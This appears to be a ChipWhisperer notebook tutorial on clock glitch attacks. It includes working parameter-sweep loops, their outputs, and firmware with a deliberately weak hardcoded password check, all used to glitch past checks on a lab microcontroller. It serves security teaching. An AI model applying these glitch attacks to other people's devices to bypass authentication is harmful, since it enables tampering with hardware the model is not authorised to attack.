# Introduction to Clock Glitch Attacks

In [76]:
import chipwhisperer as cw
scope = cw.scope()
target = cw.target(scope)

In [77]:
%run "../Helper_Scripts/Setup_Target_Generic.ipynb"

In [78]:
import time
def reset_target(scope):
    scope.io.nrst = 'low'
    #scope.io.pdic = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'
    #scope.io.pdic = 'high'

In [80]:
scope.arm()
reset_target(scope)

ret = scope.capture()
if ret:
    print("Scope capture timed out")
time.sleep(0.1)
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

Failed to glitch bootloader


### Glitch Module

All the settings/methods for the glitch module can be accessed under `scope.glitch`. As usual, documentation for the settings and methods can be accessed by the python `help` command:

In [ ]:
help(scope.glitch)

Some of the important settings we'll want to look at here are:

* clk_src
> The clock signal that the glitch DCM is using as input. Can be set to "target" or "clkgen" In this case, we'll be providing the clock to the target, so we'll want this set to "clkgen"
* offset
> Where in the output clock to place the glitch. Can be in the range `[-50, 50]`. Often, we'll want to try many offsets when trying to glitch a target.
* width
> How wide to make the glitch. Can be in the range `[-50, 50]`. Wider glitches more easily cause glitches, but are also more likely to crash the target, meaning we'll often want to try a range of widths when attacking a target.
* output
> The output produced by the glitch module. For clock glitching, clock_xor is often the most useful option.
* ext_offset
> The number of clock cycles after the trigger to put the glitch. 
* repeat
> The number of clock cycles to repeat the glitch for. Higher values increase the number of instructions that can be glitched, but often increase the risk of crashing the target.
* trigger_src
> How to trigger the glitch. For this tutorial, we want to automatically trigger the glitch from the trigger pin only after arming the ChipWhipserer, so we'll use `ext_single`

In addition, we'll need to tell ChipWhipserer to use the glitch module's output as a clock source for the target by setting `scope.io.hs2 = "glitch"`. We'll also setup a large `repeat` to make glitching easier. Finally, we'll also use a `namedtuple` to make looping through parameters simpler.

In [81]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 105
scope.io.hs2 = "glitch"
print(scope.glitch)
from collections import namedtuple
Range = namedtuple('Range', ['min', 'max', 'step'])

clk_src     = clkgen
width       = 10.15625
width_fine  = 0
offset      = 10.15625
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 0
repeat      = 105
output      = clock_xor



#### XMEGA Settings

In [ ]:
offset_range = Range(-10, 10, 1)

#### STM/CWLITEARM Settings

In [82]:
offset_range = Range(-20, -15, 1)
scope.glitch.ext_offset = 10
scope.glitch.repeat = 105

### Attack Loop

Now that the setup's done and we know how to use the glitch module, we can start our attack. The key parameters that we'll need to iterate through are `width` and `offset`, so we'll need some loops to change these. To know if we got a successful glitch, we'll check for "1234" in the output we get back. 

One additional improvement that we can make is to try each parameter multiple times and keep track of the success rate. Incorporating all of these improvements, our loop looks like:

In [59]:
from collections import namedtuple

width_range = Range(1, 2, 0.4)
sample_size = 30

scope.glitch.width = width_range.min
target.init()

attack1_data = []
scope.glitch.trigger_src = "ext_continuous"

while scope.glitch.width < width_range.max:
    scope.glitch.offset = offset_range.min
    while scope.glitch.offset < offset_range.max:
        successes = 0
        good_str = response
        for i in range(sample_size):
            # call before trace things here

            # flush the garbage from the computer's target read buffer
            target.ser.flush()

            # run aux stuff that should run before the scope arms here

            scope.arm()
            reset_target(scope)

            timeout = 50
            # wait for target to finish
            while target.isDone() is False and timeout:
                timeout -= 1
                time.sleep(0.01)

            try:
                ret = scope.capture()
                if ret:
                    print('Timeout happened during acquisition')
            except IOError as e:
                print('IOError: %s' % str(e))

            # get the results from the scope
            # read from the targets buffer
            num_chars = target.ser.inWaiting()
            response = target.ser.read(num_chars, timeout = 10)

            # for table display purposes
            success = 'Failed' not in repr(response) # check for glitch success (depends on targets active firmware)
            
            if success:
                time.sleep(0.1) #wait a bit to let it print success
                num_chars = target.ser.inWaiting()
                response2 = target.ser.read(num_chars, timeout = 1)
                if 'Success' in repr(response2) or 'Success' in repr(response):
                    successes += 1
                    good_str = repr(response) + repr(response2)
                else:
                    pass#print("False success" + response +response2)
            
        attack1_data.append([scope.glitch.width, scope.glitch.offset, successes/sample_size, good_str]) 
        # run aux stuff that should happen after trace here
        scope.glitch.offset += offset_range.step
    scope.glitch.width += width_range.step

print("Done glitching")
scope.glitch.trigger_src = "ext_single"

Done glitching


In [85]:
from collections import namedtuple
from tqdm import tnrange

width_range = Range(1, 2, 0.4)
sample_size = 30

scope.glitch.ext_offset = 10
scope.glitch.repeat = 10

scope.glitch.width = width_range.min
target.init()

attack1_data = []
scope.glitch.trigger_src = "ext_continuous"
scope.glitch.width = 1.56
scope.glitch.offset = -18.75
for scope.glitch.ext_offset in tnrange(50, 100, leave=False):
    successes = 0
    good_str = response
    for i in tnrange(sample_size, leave=False):
        # call before trace things here

        # flush the garbage from the computer's target read buffer
        target.ser.flush()

        # run aux stuff that should run before the scope arms here

        scope.arm()
        reset_target(scope)

        timeout = 50
        # wait for target to finish
        while target.isDone() is False and timeout:
            timeout -= 1
            time.sleep(0.01)

        try:
            ret = scope.capture()
            if ret:
                print('Timeout happened during acquisition')
        except IOError as e:
            print('IOError: %s' % str(e))

        # get the results from the scope
        # read from the targets buffer
        num_chars = target.ser.inWaiting()
        response = target.ser.read(num_chars, timeout = 10)

        # for table display purposes
        success = 'Failed' not in repr(response) # check for glitch success (depends on targets active firmware)

        if success:
            time.sleep(0.1) #wait a bit to let it print success
            num_chars = target.ser.inWaiting()
            response2 = target.ser.read(num_chars, timeout = 1)
            if 'Success' in repr(response2) or 'Success' in repr(response):
                successes += 1
                good_str = repr(response) + repr(response2)
            else:
                print("False success" + response +response2)

    attack1_data.append([scope.glitch.width, scope.glitch.ext_offset, successes/sample_size, good_str]) 
    # run aux stuff that should happen after trace here

print("Done glitching")
scope.glitch.trigger_src = "ext_single"

False success  


False success   


False success   


False success   
False success    


False success    


...

False success  


False success  
False success 


False success     


False success     


False success  ÿ
Done glitching


In [101]:
from collections import namedtuple
from tqdm import tnrange

scope.io.hs2 = "clkgen"
scope.glitch.output = "glitch_only"
scope.glitch.width = 21.48
scope.glitch.offset = 1.17
scope.glitch.repeat = 1
scope.io.glitch_lp = True

sample_size = 10
target.init()

attack1_data = []
scope.glitch.trigger_src = "ext_continuous"
max_offset = 2
max_width = 22
while scope.glitch.width < max_width:
    while scope.glitch.offset < max_offset:
        for scope.glitch.ext_offset in tnrange(60, 100, leave=False):
            successes = 0
            good_str = response
            for i in tnrange(sample_size, leave=False):
                # call before trace things here

                # flush the garbage from the computer's target read buffer
                target.ser.flush()

                # run aux stuff that should run before the scope arms here

                scope.arm()
                reset_target(scope)

                timeout = 50
                # wait for target to finish
                while target.isDone() is False and timeout:
                    timeout -= 1
                    time.sleep(0.01)

                try:
                    ret = scope.capture()
                    if ret:
                        print('Timeout happened during acquisition')
                except IOError as e:
                    print('IOError: %s' % str(e))

                # get the results from the scope
                # read from the targets buffer
                num_chars = target.ser.inWaiting()
                response = target.ser.read(num_chars, timeout = 10)

                # for table display purposes
                success = 'Failed' not in repr(response) # check for glitch success (depends on targets active firmware)

                if success:
                    time.sleep(0.1) #wait a bit to let it print success
                    num_chars = target.ser.inWaiting()
                    response2 = target.ser.read(num_chars, timeout = 1)
                    if 'Success' in repr(response2) or 'Success' in repr(response):
                        successes += 1
                        good_str = repr(response) + repr(response2)
                    else:
                        print("False success" + response +response2)

            attack1_data.append([scope.glitch.width, scope.glitch.ext_offset, successes/sample_size, good_str]) 
            # run aux stuff that should happen after trace here
        scope.glitch.offset += 1
    scope.glitch.width += 1

print("Done glitching")
scope.glitch.trigger_src = "ext_single"

False success!   
False success    
False success!   
False success!!   
False success!  


False success!    
False success!   
False success     
False success!!   
False success !  
False success    
False success   
False success#%    
False success    
False success   


False success!!   
False success ! 
False success!  
False success    
False successÓ!   
False success    
False success   
False success!     
False success!  
False success !    


False success! ! 
False success@     
False success     
False success   
False success³ !    
False success!    
False success      
False success!!   
False success!   
False success³   


False success    
False success!   
False success!!!   
False success     
False success   
False success³ !   
False successÒ!!!    
False success!!!!  
False success 
False success !!   


...

False success3    
False success !   
False success!!  
False success!!   
False success!!  
False success!  
False success     
False success!!  
False success !!   
False success !    


False success     
False successi!   
False success   
False success !   
False success!!!  
False success!! 
False success !!   
False success!   
False success    
False success   


False success !   
False success     
False success!    
False success    
False success      
False success   
False success   
False success   
False success ! 
False success! !   


False success !   
False successi    
False success    
False success!  
False success³     
False success ! ! 
False success    
False success   
False success     
False success !   


Done glitching


In [88]:
help(scope.io)

Help on GPIOSettings in module chipwhisperer.capture.scopes.cwhardware.ChipWhispererExtra object:

class GPIOSettings(chipwhisperer.common.utils.util.DisableNewAttr)
 |  GPIOSettings(cwextra)
 |  
 |  Provides an ability to disable setting new attributes in a class, useful to prevent typos.
 |  
 |  Usage:
 |  1. Make a class that inherits this class:
 |  >>> class MyClass(DisableNewAttr):
 |  >>>     # Your class definition here
 |  
 |  2. After setting up all attributes that your object needs, call disable_newattr():
 |  >>>     def __init__(self):
 |  >>>         self.my_attr = 123
 |  >>>         self.disable_newattr()
 |  
 |  3. Subclasses raise an AttributeError when trying to make a new attribute:
 |  >>> obj = MyClass()
 |  >>> #obj.my_new_attr = 456   <-- Raises AttributeError
 |  
 |  Method resolution order:
 |      GPIOSettings
 |      chipwhisperer.common.utils.util.DisableNewAttr
 |      builtins.object
 |  
 |  Methods defined here:
 |  
 |  __init__(self, cwextra)
 | 

Now that we've tried some glitches, let's look at the results. There's going to be a lot of data here, so we'll only print parameters that lead to successful glitches:

In [102]:
for row in attack1_data:
    if row[2] > 0:
        print(row)
    #print(row)

[21.484375, 66, 1.0, "'  \\x00\\x00\\x00Success!'''"]
[21.484375, 71, 0.7, "'\\x9a\\x08!\\x01!\\x00 Success!'''"]
[21.484375, 82, 1.0, "' \\x01!!\\x00\\x00Success!'''"]
[21.484375, 85, 1.0, "'\\x9a\\x01 \\x01\\x00\\x00\\x00Success!'''"]
[21.484375, 98, 1.0, "'\\x9a\\x00!\\x00Success!'''"]


With any luck, you'll have some successful glitches. Create a smaller range of offsets and widths where the majority of successful glitches can be found. This will greatly speed up future attacks (though be sure not to make the bounds too small, since you might miss successful settings for some attacks). For example, you may have found most of your glitches between a width `[-9,-5]` and an offset of `[-37, -40]`, so good ranges might be `[-10, -4]` and `[-35, -41]`.

If you didn't get any successful glitches, note that we only used an `offset` of `[-10,10]` or `[-49, -30]` (the max is `[-50, 50]`). Try using a larger range of offsets to see if a successful offset lies outside of this range.

If you want to take this attack further, try reducing the `repeat` to 1 and iterating through `ext_offset` to look for the precise clock cycle where the glitch succeeds. To save time, pick a `width` and `offset` that worked for you and only vary `ext_offset`. Note that even with the right parameters and location, inserting a glitch won't always work, so a better strategy may be to loop infinitely over `ext_offset` values until you get a successful glitch.

**HINT: We used a `repeat` of 105 for this attack (and an `ext_offset` of 0) on XMEGA, which put a glitch in each of the first 105 clock cycles. This means `ext_offset` must be in the range `[0,105]` for this target.**

## Attack 2

Now that you (hopefully) have parameters that cause semi-reliable glitches, we can look at a more challenging example: a password check. Go back to `glitchsimple.c` and find the `glitch3()` function:

```C
void glitch3(void)
{
    char inp[16];
    char c = 'A';
    unsigned char cnt = 0;
    uart_puts("Password:");

    while((c != '\n') & (cnt < 16)){
        c = getch();
        inp[cnt] = c;
        cnt++;
    }

    char passwd[] = "touch";
    char passok = 1;

    trigger_high();
    trigger_low();

    //Simple test - doesn't check for too-long password!
    for(cnt = 0; cnt < 5; cnt++){
        if (inp[cnt] != passwd[cnt]){
            passok = 0;
        }
    }

    if (!passok){
        uart_puts("Denied\n");
    } else {
        uart_puts("Welcome\n");
    }
}
```

As you might expect, we'll try to glitch past the `if(!passok)` check towards the end of the code. Change `main()` to call `glitch3()` (running the block below will do this). Like before, we'll build and program the new firmware.

In [ ]:
%%bash
# replaces glitch1() with glitch3()
cd ../../hardware/victims/firmware/glitch-simple-lab1
awk '{gsub(/glitch1\(\)/, "glitch3()")}1' glitchsimple.c > tmp.c 2>/dev/null
rm glitchsimple.c
mv tmp.c glitchsimple.c

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../hardware/victims/firmware/glitch-simple-lab1
make PLATFORM=$1 CRYPTO_TARGET=$2

In [ ]:
cw.programTarget(scope, prog, fw_path)

Now let's make sure we can communicate with the password check with a successful password:

In [ ]:
scope.arm()
target.ser.write("touch\n")

ret = scope.capture()
if ret:
    print("Scope capture timed out")
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

and an unsuccessful one:

In [ ]:
scope.arm()
target.ser.write("x\n")

ret = scope.capture()
if ret:
    print("Scope capture timed out")
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout = 10)
print(response)

One thing that you may have run into in the previous part is that using a large repeat value makes the target more likely to crash. As mentioned in the previous part, we can use smaller ranges of offset and width, use a repeat value of 1, and iterate through the external offset instead to get a successful glitch. This is often a much more reliable way to glitch targets.

One other thing we need to consider is crashing. In the previous part, we didn't need to worry about crashing since we always reset after a glitch attempt anyway. This is no longer true. Instead we'll need to detect glitches and, if they happen, reset the target. Typically a good way to detect crashes is by running through the loop again and looking for a timeout. This is rather slow, but for this attack, we don't really have a better method. One thing we can do to speed this up is to decrease the adc timeout value (via `scope.adc.timeout`). Resetting is the same in the last part.

Putting it all together (don't forget to update the width and offset with ranges that worked in the last part):

### Attack Loop

In [ ]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.glitch.ext_offset = 0
scope.io.hs2 = "glitch"

target.init()
attack2_data = []
scope.adc.timeout = 0.1
offset_range = Range(-41, -35, 1)
width_range = Range(-10, -5, 1)

scope.glitch.width = width_range.min
while scope.glitch.width < width_range.max:
    scope.glitch.offset = offset_range.min
    while scope.glitch.offset < offset_range.max:
        for i in range(0, 20):
            scope.glitch.ext_offset = i
            # call before trace things here

            # flush the garbage from the computer's target read buffer
            target.ser.flush()

            # run aux stuff that should run before the scope arms here

            scope.arm()
            target.ser.write("x\n")

            timeout = 50
            # wait for target to finish
            while target.isDone() is False and timeout:
                timeout -= 1
                time.sleep(0.01)

            try:
                ret = scope.capture()
                if ret:
                    print('Timeout happened during acquisition')
                    reset_target(scope)
            except IOError as e:
                print('IOError: %s' % str(e))

            # get the results from the scope
            # read from the targets buffer
            num_chars = target.ser.inWaiting()
            response = target.ser.read(num_chars, timeout = 10)

            # for table display purposes
            success = 'Welcome' in repr(response) # check for glitch success (depends on targets active firmware)
            attack2_data.append([scope.glitch.offset, scope.glitch.width, scope.glitch.ext_offset, success, repr(response)]) 

            # run aux stuff that should happen after trace here
        scope.glitch.offset += offset_range.step
    scope.glitch.width += width_range.step
print("Done glitching")

In [ ]:
print(scope.adc.trig_count)
for row in attack2_data:
    if row[3]:
        print(row)

With any luck, you should have some successful attacks. If you weren't able to glitch the target, you may want to try a larger range of width/offset values. You may also want to try decreasing the step value for these ranges as well.

With the tutorial now over, we should disconnect from the ChipWhisperer

In [ ]:
scope.dis()
target.dis()

## Glitching Onward

This basic tutorial has introduced you to glitch attacks. They are a powerful tool for bypassing authentication in embedded hardware devices. There are many ways to expand your knowledge with additional practice, such as:

* Manual glitches can be triggered by calling `scope.glitch.manualTrigger()` and `scope.glitch.trigger_src = "manual"`. Try using manual glitches to simply glitch past the prompt in `glitch3()`.
* Completing the VCC Glitch Attacks tutorial (not yet available), which introduces glitching via voltage instead of the clock.
* Download some example source code (bootloaders, login prompts, etc) and port them to your target. See how you can glitch past security checks.
* Use one of the IO triggers discussed in Tutorial_A1_Synchronization_to_Communication_Lines.

## Tests

In [ ]:
success = False
for row in attack1_data:
    if row[2] > 0:
        success = True
assert success, "Failed to glitch attack 1\n{}".format(attack1_data)

In [ ]:
success = False
for row in attack2_data:
    if row[3]:
        success = True
assert success, "Failed to glitch attack 2\n{}".format(attack2_data)